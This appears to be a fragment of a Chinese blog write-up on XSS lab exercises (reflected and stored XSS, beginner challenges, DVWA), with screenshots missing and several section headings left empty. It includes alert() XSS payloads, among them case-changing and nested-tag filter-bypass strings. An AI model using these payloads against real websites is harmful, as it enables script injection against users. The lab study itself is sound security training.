-
反射型
<script>alert("xss")</script> -
存储型
1.字数不限制时
image.png
2.字数限制时(分两步,留言两次)
先铺垫
image.png
再合并
image.png
3.结果
image.png
image.png
-
初级挑战
1.Exampe1
源码:
image.png
<script>alert("xss")</script>
image.png
2.Exampe1
源码:
image.png
<Script>alert("xss")</Script>
image.png
3.Exampe1
源码:
image.png
<scr<script>ipt>alert("xss")</sc</script>ript>
image.png
-
中级挑战
-
高级挑战
-
DVWA之反射型XSS
-
DVWA之存储型XSS
-
Csrf利用管理员权限创建后台管理账户
-
DVWA之CSRF
网友评论